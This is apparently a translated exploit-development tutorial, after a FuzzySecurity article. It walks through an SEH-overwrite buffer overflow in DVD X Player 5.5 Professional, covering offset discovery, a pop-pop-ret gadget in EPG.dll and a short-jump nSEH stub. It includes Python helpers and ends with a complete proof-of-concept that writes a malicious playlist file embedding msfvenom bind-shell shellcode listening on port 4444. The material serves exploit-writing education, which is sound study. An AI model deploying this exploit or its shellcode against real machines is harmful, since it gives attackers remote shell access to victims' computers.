Original article: https://www.fuzzysecurity.com/tutorials/expDev/3.html
A Chinese translation is also available on Pediy (看雪): https://bbs.pediy.com/user-686289-2.htm
Vulnerable software
Link: https://pan.baidu.com/s/1XIVgoo7t2kCwbd1wZLJ7Zw
Extraction code: khmh
Install the package downloaded above in an XP virtual machine, then create a file with the script below. Opening that file with the installed software causes a buffer overflow that overwrites the SEH chain.
filename = "evil.plf"
buffer = b"A" * 2000             # 2000 bytes of filler, enough to reach the SEH record
textfile = open(filename, 'wb')  # binary mode so the bytes are written unchanged
textfile.write(buffer)
textfile.close()
Start the software first, attach the debugger to it, then click run.
As shown in the figure below, open the file we created with the script above.
After clicking Open Playlist the debugger pauses on the exception; press Shift+F9 to continue and switch back to DVD X Player.
You can see that the SEH chain has been overwritten.
Use gdb's PEDA plugin to determine the offset.
gdb-peda$ pattern create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
Replace the contents of the file with the string above. Repeat the steps above and look at the SEH chain again: the handler has been overwritten with 0x24424142.
Determine the offset
OK, so far so good. Based on this information we can reconstruct our buffer as shown below. We will allocate 4 bytes for nSEH, which is placed directly before SEH, which also takes up 4 bytes.
Construct the buffer again
buffer = "A"*608 + [nSEH] + [SEH] + "D"*1384
buffer = "A"*608 + "B"*4 + "C"*4 + "D"*1384
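The offset lookup that PEDA's pattern offset performs, written out as an added example (this is not code from the original post or from PEDA): it regenerates a PEDA-style cyclic pattern, maps the observed handler value 0x24424142 back to the little-endian bytes it was read from, and locates them. The 68-character alphabet used here is reproduced from the pattern shown above and is an assumption about PEDA's default; the de Bruijn construction is what guarantees every 3-byte window is unique, so a single 4-byte value pins down one offset.

```python
import struct

# Alphabet of PEDA's default (extended) cyclic pattern: uppercase letters interleaved
# column by column with "%$-;" + lowercase (minus s and n) and "sn()" + digits.
# Assumption: reconstructed from the pattern on the page, not copied from PEDA's source.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER_EXT = "%$-;" + "".join(c for c in "abcdefghijklmnopqrstuvwxyz" if c not in "sn")
DIGITS_EXT = "sn()" + "0123456789"


def peda_charset():
    """Interleave the three sub-alphabets column by column: A % s B $ n C - ( D ; ) E a 0 ..."""
    mixed = []
    for k in range(max(len(UPPER), len(LOWER_EXT), len(DIGITS_EXT))):
        for sub in (UPPER, LOWER_EXT, DIGITS_EXT):
            mixed.append(sub[k:k + 1])   # empty once a sub-alphabet is exhausted
    return "".join(mixed)


def de_bruijn(charset, n, maxlen):
    """Standard de Bruijn sequence B(k, n) over charset, truncated to maxlen characters.
    Every window of n characters occurs once, which is what makes offsets recoverable."""
    k = len(charset)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= maxlen:
            return
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    if len(seq) >= maxlen:
                        return
                    seq.append(charset[a[j]])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(seq) >= maxlen:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(seq)


def pattern_create(size):
    """Equivalent of `pattern create <size>`: a cyclic pattern with 3-character windows."""
    return de_bruijn(peda_charset(), 3, size)


def pattern_offset(pattern, value):
    """Map a 32-bit value seen in a register or the SEH record back to its position.
    x86 is little-endian, so 0x24424142 was loaded from the bytes 42 41 42 24 = 'BAB$'."""
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern.find(needle)


def seh_layout(pattern, handler_value):
    """Offsets of the nSEH and SEH slots given the value that overwrote the handler."""
    seh = pattern_offset(pattern, handler_value)
    if seh < 0:
        raise ValueError("handler value not found in pattern")
    return {"nseh": seh - 4, "seh": seh}   # nSEH sits directly before the handler pointer


if __name__ == "__main__":
    pat = pattern_create(1000)
    layout = seh_layout(pat, 0x24424142)
    print("SEH handler at offset %d, nSEH at offset %d" % (layout["seh"], layout["nseh"]))
```

With the 1000-byte pattern the handler value lands at offset 612, so the nSEH slot starts at 608, which is exactly the 608 bytes of filler in the reconstructed buffer above.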
After the next crash, use mona to find pop pop ret gadgets.
Here we use
0x61617619 : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll)
Construct the buffer again
filename = "evil.plf"
# 608 bytes of filler, 4 bytes for nSEH, then the pop pop ret address 0x61617619 in little-endian
buffer = b"A"*608 + b"B"*4 + b"\x19\x76\x61\x61" + b"D"*1384
textfile = open(filename, 'wb')  # binary mode so the bytes are written unchanged
textfile.write(buffer)
textfile.close()
Start the program, attach the debugger, set a breakpoint at 0x61617619, then open the file with the vulnerable software. After passing the first exception with Shift+F9 we reach the breakpoint.
After the ret executes, execution jumps to 0x12f5b8, which is our stack: the 'B' bytes we supplied are being executed as instructions.
We can also see that 0x12F5C0 holds our 'D' string, so we replace the 'B' bytes with the instruction jmp 0x12F5C0.
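The nSEH bytes \xEB\x06\x90\x90 used in the final PoC are a 2-byte x86 short jump (EB rel8) padded with two NOPs. As an added example, not code from the original post, this encodes and decodes the displacement using the page's addresses: the jump sits in the nSEH slot at 0x12f5b8 and targets the data at 0x12F5C0. The displacement is counted from the end of the jump instruction, and the range check matters because rel8 is a signed two's-complement byte.

```python
def short_jmp(from_addr, to_addr):
    """Encode `jmp short to_addr` placed at from_addr as EB <rel8>.
    rel8 is relative to the address of the next instruction, i.e. from_addr + 2."""
    rel = to_addr - (from_addr + 2)
    if not -128 <= rel <= 127:
        raise ValueError("target out of rel8 range: %d" % rel)
    return bytes([0xEB, rel & 0xFF])   # & 0xFF gives the two's-complement byte for negatives


def decode_short_jmp(code, at_addr):
    """Inverse of short_jmp: return the target of an EB rel8 located at at_addr."""
    if len(code) < 2 or code[0] != 0xEB:
        raise ValueError("not a short jmp")
    rel = code[1] - 0x100 if code[1] >= 0x80 else code[1]   # sign-extend rel8
    return at_addr + 2 + rel


def nseh_stub(nseh_addr, target_addr):
    """Fill the 4-byte nSEH slot: the 2-byte jump plus two NOPs to keep the slot length."""
    return short_jmp(nseh_addr, target_addr) + b"\x90\x90"


if __name__ == "__main__":
    NSEH_ADDR, TARGET = 0x12f5b8, 0x12f5c0        # addresses observed in the debugger above
    stub = nseh_stub(NSEH_ADDR, TARGET)
    print("nSEH bytes:", stub.hex())               # eb069090
    print("jumps to: 0x%x" % decode_short_jmp(stub, NSEH_ADDR))
```

The displacement of 6 skips the remaining 2 bytes of the nSEH slot plus the 4-byte handler pointer, which is why the payload in the final PoC begins at 0x12F5C0.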
So the final PoC is as follows. The shellcode is the one from the previous chapter, except that the bad bytes excluded when generating it differ from the previous chapter.
# root @ kali in ~ [9:04:36]
$ msfvenom -p windows/shell_bind_tcp lport=4444 -f c -b '\x00\x0A\x0D\x1A'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] =
"\xdb\xd3\xb8\x1c\x01\x75\xbc\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x83\xc5\x04\x31\x45\x13\x03\x59\x12\x97\x49\x9d\xfc\xd5"
"\xb2\x5d\xfd\xb9\x3b\xb8\xcc\xf9\x58\xc9\x7f\xca\x2b\x9f\x73"
"\xa1\x7e\x0b\x07\xc7\x56\x3c\xa0\x62\x81\x73\x31\xde\xf1\x12"
"\xb1\x1d\x26\xf4\x88\xed\x3b\xf5\xcd\x10\xb1\xa7\x86\x5f\x64"
"\x57\xa2\x2a\xb5\xdc\xf8\xbb\xbd\x01\x48\xbd\xec\x94\xc2\xe4"
"\x2e\x17\x06\x9d\x66\x0f\x4b\x98\x31\xa4\xbf\x56\xc0\x6c\x8e"
"\x97\x6f\x51\x3e\x6a\x71\x96\xf9\x95\x04\xee\xf9\x28\x1f\x35"
"\x83\xf6\xaa\xad\x23\x7c\x0c\x09\xd5\x51\xcb\xda\xd9\x1e\x9f"
"\x84\xfd\xa1\x4c\xbf\xfa\x2a\x73\x6f\x8b\x69\x50\xab\xd7\x2a"
"\xf9\xea\xbd\x9d\x06\xec\x1d\x41\xa3\x67\xb3\x96\xde\x2a\xdc"
"\x5b\xd3\xd4\x1c\xf4\x64\xa7\x2e\x5b\xdf\x2f\x03\x14\xf9\xa8"
"\x64\x0f\xbd\x26\x9b\xb0\xbe\x6f\x58\xe4\xee\x07\x49\x85\x64"
"\xd7\x76\x50\x10\xdf\xd1\x0b\x07\x22\xa1\xfb\x87\x8c\x4a\x16"
"\x08\xf3\x6b\x19\xc2\x9c\x04\xe4\xed\xb3\x88\x61\x0b\xd9\x20"
"\x24\x83\x75\x83\x13\x1c\xe2\xfc\x71\x34\x84\xb5\x93\x83\xab"
"\x45\xb6\xa3\x3b\xce\xd5\x77\x5a\xd1\xf3\xdf\x0b\x46\x89\xb1"
"\x7e\xf6\x8e\x9b\xe8\x9b\x1d\x40\xe8\xd2\x3d\xdf\xbf\xb3\xf0"
"\x16\x55\x2e\xaa\x80\x4b\xb3\x2a\xea\xcf\x68\x8f\xf5\xce\xfd"
"\xab\xd1\xc0\x3b\x33\x5e\xb4\x93\x62\x08\x62\x52\xdd\xfa\xdc"
"\x0c\xb2\x54\x88\xc9\xf8\x66\xce\xd5\xd4\x10\x2e\x67\x81\x64"
"\x51\x48\x45\x61\x2a\xb4\xf5\x8e\xe1\x7c\x05\xc5\xab\xd5\x8e"
"\x80\x3e\x64\xd3\x32\x95\xab\xea\xb0\x1f\x54\x09\xa8\x6a\x51"
"\x55\x6e\x87\x2b\xc6\x1b\xa7\x98\xe7\x09";
The PoC is as follows
filename = "evil.plf"
# Payload generated with msfvenom above (bad bytes \x00\x0A\x0D\x1A excluded)
shellcode = (
b"\xdb\xd3\xb8\x1c\x01\x75\xbc\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
b"\x53\x83\xc5\x04\x31\x45\x13\x03\x59\x12\x97\x49\x9d\xfc\xd5"
b"\xb2\x5d\xfd\xb9\x3b\xb8\xcc\xf9\x58\xc9\x7f\xca\x2b\x9f\x73"
b"\xa1\x7e\x0b\x07\xc7\x56\x3c\xa0\x62\x81\x73\x31\xde\xf1\x12"
b"\xb1\x1d\x26\xf4\x88\xed\x3b\xf5\xcd\x10\xb1\xa7\x86\x5f\x64"
b"\x57\xa2\x2a\xb5\xdc\xf8\xbb\xbd\x01\x48\xbd\xec\x94\xc2\xe4"
b"\x2e\x17\x06\x9d\x66\x0f\x4b\x98\x31\xa4\xbf\x56\xc0\x6c\x8e"
b"\x97\x6f\x51\x3e\x6a\x71\x96\xf9\x95\x04\xee\xf9\x28\x1f\x35"
b"\x83\xf6\xaa\xad\x23\x7c\x0c\x09\xd5\x51\xcb\xda\xd9\x1e\x9f"
b"\x84\xfd\xa1\x4c\xbf\xfa\x2a\x73\x6f\x8b\x69\x50\xab\xd7\x2a"
b"\xf9\xea\xbd\x9d\x06\xec\x1d\x41\xa3\x67\xb3\x96\xde\x2a\xdc"
b"\x5b\xd3\xd4\x1c\xf4\x64\xa7\x2e\x5b\xdf\x2f\x03\x14\xf9\xa8"
b"\x64\x0f\xbd\x26\x9b\xb0\xbe\x6f\x58\xe4\xee\x07\x49\x85\x64"
b"\xd7\x76\x50\x10\xdf\xd1\x0b\x07\x22\xa1\xfb\x87\x8c\x4a\x16"
b"\x08\xf3\x6b\x19\xc2\x9c\x04\xe4\xed\xb3\x88\x61\x0b\xd9\x20"
b"\x24\x83\x75\x83\x13\x1c\xe2\xfc\x71\x34\x84\xb5\x93\x83\xab"
b"\x45\xb6\xa3\x3b\xce\xd5\x77\x5a\xd1\xf3\xdf\x0b\x46\x89\xb1"
b"\x7e\xf6\x8e\x9b\xe8\x9b\x1d\x40\xe8\xd2\x3d\xdf\xbf\xb3\xf0"
b"\x16\x55\x2e\xaa\x80\x4b\xb3\x2a\xea\xcf\x68\x8f\xf5\xce\xfd"
b"\xab\xd1\xc0\x3b\x33\x5e\xb4\x93\x62\x08\x62\x52\xdd\xfa\xdc"
b"\x0c\xb2\x54\x88\xc9\xf8\x66\xce\xd5\xd4\x10\x2e\x67\x81\x64"
b"\x51\x48\x45\x61\x2a\xb4\xf5\x8e\xe1\x7c\x05\xc5\xab\xd5\x8e"
b"\x80\x3e\x64\xd3\x32\x95\xab\xea\xb0\x1f\x54\x09\xa8\x6a\x51"
b"\x55\x6e\x87\x2b\xc6\x1b\xa7\x98\xe7\x09")
evil = b"\x90"*20 + shellcode                   # NOP sled in front of the shellcode
# 608 bytes of filler, nSEH = jmp short +6 (EB 06) padded with two NOPs,
# SEH = 0x61617619 (pop esi # pop edi # ret in EPG.dll) in little-endian,
# then the payload and enough filler to keep the total length at 2000 bytes
buffer = b"A"*608 + b"\xEB\x06\x90\x90" + b"\x19\x76\x61\x61" + evil + b"B"*(1384-len(evil))
textfile = open(filename, 'wb')                 # binary mode so the bytes are written unchanged
textfile.write(buffer)
textfile.close()